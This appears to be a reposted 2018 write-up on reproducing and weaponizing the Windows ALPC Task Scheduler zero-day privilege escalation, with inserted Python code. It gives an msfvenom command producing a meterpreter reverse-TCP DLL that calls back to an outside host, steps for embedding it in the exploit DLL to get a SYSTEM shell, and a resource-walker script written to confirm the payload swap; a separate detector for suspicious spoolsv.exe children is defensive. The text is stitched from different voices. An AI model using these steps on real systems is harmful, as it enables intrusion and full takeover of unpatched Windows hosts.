TVT618

How to Exploit ALPC bug zero-day?

Aug 30th, 2018
How to use?
A zero-day local privilege escalation for Windows was published on August 28th on Twitter by @sandboxescaper, whose account was pulled quickly. The PoC is on GitHub. The video posted with the PoC wasn't very clear, so I made a quick reproduction to verify whether it works, and it certainly does.
* As Administrator, open Process Explorer: right click, "Run as administrator".
* As a regular user, launch notepad. If you open it from cmd, notepad appears as a child process of cmd. This process runs with the user context you launched it with. Note that the PID of the notepad process is 3872.
* If you need to see the username and integrity level in Process Explorer, go to View -> Select Columns and check them.

Now, have a look at the spoolsv.exe process, which is where the action is going to happen. Nothing much here yet.
Now fire the exploit off and see what happens (this is demonstrated in the PoC video). I use the PID of the notepad process we spawned earlier, 3872.
Now, it appears that nothing is happening, but take a look at spoolsv in Process Explorer again.
OH F*CK! cmd.exe with the subprocesses conhost and notepad has spawned as SYSTEM!

Windows 10 - works!
Zero-day priv esc confirmed on Windows 10 1803. No patch has been released by MS yet (28/08/2018).
This could probably be tweaked to open an actual cmd window as SYSTEM instead of a windowless process in the background.
Edit on the above: @plaintext notified me that the processes spawn in session 0, which is why they won't be visible to a user who operates in session 1. If you toggle the Session column in the Select Columns panel in Process Explorer you can see that very clearly.

Server 2016 - works!
Windows 7 - Nothing happens :) :) :)

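The Process Explorer check above (parent spoolsv.exe, user SYSTEM, session 0) can be turned into a query over process-creation records, so the same condition can be spotted without sitting in front of the box. The following is an added example of my own, not code from the write-up or from the PoC. The event records are constructed to mirror the scenario on this page (notepad PID 3872 in session 1 as a normal user, a cmd.exe tree under spoolsv.exe in session 0 as SYSTEM); the field names, the PIDs other than 3872 and the allowlist of legitimate spooler children are assumptions.

```python
"""Added example (not from the original write-up or the PoC): flag every
process that descends from spoolsv.exe and runs as SYSTEM or in session 0,
which is exactly what the author saw in Process Explorer after firing the
exploit. Event records are constructed below; the field names are my own."""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image file name, e.g. "cmd.exe"
    user: str       # account the process runs as, e.g. r"NT AUTHORITY\SYSTEM"
    session: int    # Windows session id: 0 = services, 1+ = interactive desktops
    integrity: str  # "Medium", "High" or "System"


# Assumption: images the spooler starts during normal printing. This list is
# illustrative; tune it from a baseline of your own hosts.
EXPECTED_SPOOLER_CHILDREN = {"splwow64.exe", "printisolationhost.exe"}


def is_system(ev: ProcEvent) -> bool:
    return ev.user.upper().endswith("\\SYSTEM") or ev.integrity.lower() == "system"


def lineage(ev: ProcEvent, by_pid: dict) -> list:
    """Ancestors of ev, nearest first. Guards against PID-reuse cycles."""
    chain, seen = [], set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def spooler_descendants(events: list) -> list:
    """Return (pid, image, spooler_pid, reasons) for suspicious spooler offspring."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        spooler = next((a for a in lineage(ev, by_pid)
                        if a.image.lower() == "spoolsv.exe"), None)
        if spooler is None:
            continue  # not under the spooler at all
        # Known-good direct children are only excused when they are NOT SYSTEM.
        if (ev.ppid == spooler.pid and ev.image.lower() in EXPECTED_SPOOLER_CHILDREN
                and not is_system(ev)):
            continue
        reasons = []
        if is_system(ev):
            reasons.append("runs as SYSTEM")
        if ev.session == 0:
            reasons.append("session 0, invisible on the interactive desktop")
        if reasons:
            findings.append((ev.pid, ev.image, spooler.pid, reasons))
    return findings


# Constructed sample mirroring the page: 3872 is the page's notepad PID,
# every other PID and the account name are made up.
SAMPLE_EVENTS = [
    ProcEvent(700, 600, "services.exe", "NT AUTHORITY\\SYSTEM", 0, "System"),
    ProcEvent(1304, 700, "spoolsv.exe", "NT AUTHORITY\\SYSTEM", 0, "System"),
    ProcEvent(2200, 2100, "explorer.exe", "LAB\\alice", 1, "Medium"),
    ProcEvent(3100, 2200, "cmd.exe", "LAB\\alice", 1, "Medium"),
    ProcEvent(3872, 3100, "notepad.exe", "LAB\\alice", 1, "Medium"),   # the user's notepad
    ProcEvent(5000, 1304, "splwow64.exe", "LAB\\alice", 1, "Medium"),  # legitimate spooler child
    ProcEvent(4412, 1304, "cmd.exe", "NT AUTHORITY\\SYSTEM", 0, "System"),     # exploit result
    ProcEvent(4420, 4412, "conhost.exe", "NT AUTHORITY\\SYSTEM", 0, "System"),
    ProcEvent(4436, 4412, "notepad.exe", "NT AUTHORITY\\SYSTEM", 0, "System"),
]

if __name__ == "__main__":
    for pid, image, parent, reasons in spooler_descendants(SAMPLE_EVENTS):
        print(f"pid {pid} {image} under spoolsv.exe {parent}: {', '.join(reasons)}")
```

On a live host the same four fields (parent PID, user, integrity level, terminal session) are available from Sysmon's process-creation event or from the User, Integrity and Session columns the author enabled in Process Explorer, so the logic ports directly to whichever log source you collect.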
Weaponization maybe?
After reading the source code I discovered that notepad is launched from exploit.dll, which is added as a resource. This can be seen at lines 101-105 in the source code.

//Payload is included as a resource, you need to modify this resource accordingly.
HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
unsigned int myResourceSize = ::SizeofResource(mod, myResource);
HGLOBAL myResourceData = ::LoadResource(mod, myResource);
void* pMyBinaryData = ::LockResource(myResourceData);

Clicking on that resource shows that exploit.dll, which in the PoC just spawns notepad, can't be read, since I don't have it at that absolute path.

So instead of recompiling and fixing the 500 errors I got from Visual Studio, I decided it was easier to replace the DLL directly as a resource with CFF Explorer. But before I did that I had to prepare the payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.0.16 lport=444 -f dll -o lol.dll

Select "Replace Resource (raw)" in CFF Explorer and provide lol.dll. Then save ALPC-TaskSched-LPE.dll as a new file. The entire exploit, payload included, is now embedded in that one DLL file.

So we fire off the exploit again, just like we did above, and wait for our shell to come back.
Woop de doo, we got a SYSTEM meterpreter.

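To confirm that the resource swap actually took before firing the exploit again, it helps to know what CFF Explorer's "Replace Resource (raw)" touches: the IMAGE_RESOURCE_DATA_ENTRY (RVA and size) that the RT_RCDATA directory entry points at in the .rsrc section, which is what FindResource/SizeofResource in the snippet above resolve at run time. The walker below is an added example of my own, not the PoC's code and not CFF Explorer's. It builds a one-resource .rsrc section in memory, models a raw replacement by appending the new bytes and repointing the data entry, and then reads the directory back to verify that the payload now has lol.dll's size and hash. The section RVA, the resource id 101 (the PoC's real IDR_RCDATA1 value lives in its resource header, not on this page), the language id and the stand-in payload bytes are all assumptions; a real tool also fixes file alignment and the section header size, which this skips.

```python
"""Added example (my own, not the PoC's or CFF Explorer's): walk a PE .rsrc
directory to find an RT_RCDATA resource, model a raw replacement, and check
that the directory now points at the new payload. The section is constructed
in memory; RVA, ids and payload bytes are assumptions."""
import hashlib
import struct

RT_RCDATA = 10
SUBDIR_FLAG = 0x80000000
DIR_HDR = struct.Struct("<IIHHHH")   # IMAGE_RESOURCE_DIRECTORY (16 bytes)
DIR_ENTRY = struct.Struct("<II")     # IMAGE_RESOURCE_DIRECTORY_ENTRY (8 bytes)
DATA_ENTRY = struct.Struct("<IIII")  # IMAGE_RESOURCE_DATA_ENTRY (16 bytes)


def _entries(rsrc, dir_off):
    """Yield (id, target_offset, is_subdir) for one directory (id entries only)."""
    _, _, _, _, n_named, n_id = DIR_HDR.unpack_from(rsrc, dir_off)
    pos = dir_off + DIR_HDR.size
    for _ in range(n_named + n_id):
        name, target = DIR_ENTRY.unpack_from(rsrc, pos)
        yield name, target & ~SUBDIR_FLAG, bool(target & SUBDIR_FLAG)
        pos += DIR_ENTRY.size


def _child(rsrc, dir_off, wanted):
    """First entry of a directory matching `wanted` (None = any entry)."""
    for name, target, is_subdir in _entries(rsrc, dir_off):
        if wanted is None or name == wanted:
            return target, is_subdir
    raise KeyError(f"resource id {wanted} not found")


def find_rcdata(rsrc, rsrc_rva, res_id):
    """Return (offset_in_section, payload) for RT_RCDATA / res_id / first language."""
    type_dir, is_sub = _child(rsrc, 0, RT_RCDATA)
    assert is_sub, "type entry must point at a subdirectory"
    id_dir, is_sub = _child(rsrc, type_dir, res_id)
    assert is_sub, "id entry must point at a subdirectory"
    data_entry, is_sub = _child(rsrc, id_dir, None)
    assert not is_sub, "language entry must point at a data entry"
    rva, size, _codepage, _reserved = DATA_ENTRY.unpack_from(rsrc, data_entry)
    off = rva - rsrc_rva  # data entry RVAs are image-relative, not section-relative
    return off, bytes(rsrc[off:off + size])


def build_rsrc(rsrc_rva, res_id, lang, payload):
    """Construct a minimal .rsrc: root -> RT_RCDATA -> res_id -> lang -> data."""
    type_dir, id_dir, data_entry, data_off = 24, 48, 72, 88
    blob = bytearray()
    blob += DIR_HDR.pack(0, 0, 0, 0, 0, 1) + DIR_ENTRY.pack(RT_RCDATA, type_dir | SUBDIR_FLAG)
    blob += DIR_HDR.pack(0, 0, 0, 0, 0, 1) + DIR_ENTRY.pack(res_id, id_dir | SUBDIR_FLAG)
    blob += DIR_HDR.pack(0, 0, 0, 0, 0, 1) + DIR_ENTRY.pack(lang, data_entry)
    blob += DATA_ENTRY.pack(rsrc_rva + data_off, len(payload), 0, 0)
    blob += payload
    return bytes(blob)


def replace_rcdata_raw(rsrc, rsrc_rva, res_id, new_payload):
    """Model of a raw replacement: append the new bytes to the section and
    repoint the data entry at them. The old bytes stay behind as dead space;
    alignment padding and the section header are left to the caller."""
    out = bytearray(rsrc)
    type_dir, _ = _child(out, 0, RT_RCDATA)
    id_dir, _ = _child(out, type_dir, res_id)
    data_entry, _ = _child(out, id_dir, None)
    new_off = len(out)
    out += new_payload
    DATA_ENTRY.pack_into(out, data_entry, rsrc_rva + new_off, len(new_payload), 0, 0)
    return bytes(out)


# Constructed stand-ins; the real exploit.dll and lol.dll are PE files, but
# only their raw bytes matter to the resource directory.
ORIGINAL_PAYLOAD = b"MZ-stand-in-for-exploit.dll-that-spawns-notepad"
NEW_PAYLOAD = b"MZ-stand-in-for-msfvenom-lol.dll" * 3
RSRC_RVA = 0x3000   # assumption: VirtualAddress of .rsrc from the section table
IDR_RCDATA1 = 101   # assumption: the PoC's real value is in its resource header


def demo():
    before = build_rsrc(RSRC_RVA, IDR_RCDATA1, 1033, ORIGINAL_PAYLOAD)
    after = replace_rcdata_raw(before, RSRC_RVA, IDR_RCDATA1, NEW_PAYLOAD)
    _, old = find_rcdata(before, RSRC_RVA, IDR_RCDATA1)
    _, new = find_rcdata(after, RSRC_RVA, IDR_RCDATA1)
    return old, new


if __name__ == "__main__":
    old, new = demo()
    digest = lambda b: hashlib.sha256(b).hexdigest()[:16]
    print(f"before: {len(old)} bytes sha256 {digest(old)}")
    print(f"after:  {len(new)} bytes sha256 {digest(new)}",
          "== lol.dll" if new == NEW_PAYLOAD else "!= lol.dll")
```

Against a real DLL you would read the .rsrc section's raw bytes and VirtualAddress from the section table, then compare the size and SHA-256 that find_rcdata reports with those of the msfvenom output; a mismatch means the exploit will still load the old exploit.dll and you will get notepad instead of a shell.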
From Darth Sidious: https://hunter2.gitbook.io/darthsidious/privilege-escalation/alpc-bug-0day